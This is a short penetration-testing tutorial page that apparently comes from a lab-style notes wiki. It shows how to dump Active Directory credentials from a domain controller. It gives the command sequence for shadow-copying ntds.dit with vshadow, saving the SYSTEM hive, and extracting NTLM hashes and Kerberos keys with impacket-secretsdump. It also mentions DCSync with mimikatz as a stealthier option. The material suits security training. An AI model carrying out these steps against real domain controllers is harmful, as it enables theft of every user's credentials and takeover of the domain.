Shadow Copies
The Volume Shadow Service (VSS) in Windows allows for the creation of snapshots of volumes or files. An attacker can leverage the vshadow utility to create a shadow copy of the AD database, ntds.dit, from a DC. After extracting the database and SYSTEM hive, they can use tools like impacket-secretsdump to dump user credentials, including NTLM hashes and Kerberos keys, offline.
The SYSTEM Hive is a registry file that stores system-level information in Windows, which is required to successfully decrypt the
ntds.ditdatabase for credential extraction.
In our scenario we will login to DC1 as jeffadmin.
Create a shadow copy of the C: drive on DC1 with vshadow.exe (-nw disables writers, -p stores the copy on disk).
vshadow.exe -nw -p C:Once the snapshot is created, we will use the shadow copy device name to copy ntds.dit to the local disk.
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bakExtract the SYSTEM registry hive.
reg.exe save hklm\system c:\system.bak Transfer the .bak files to our attacker machine and extract the credentials.
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCALDCSync with
mimikatzis a stealthier method for extracting user hashes from a DC without leaving as obvious a trail.
Last updated
Was this helpful?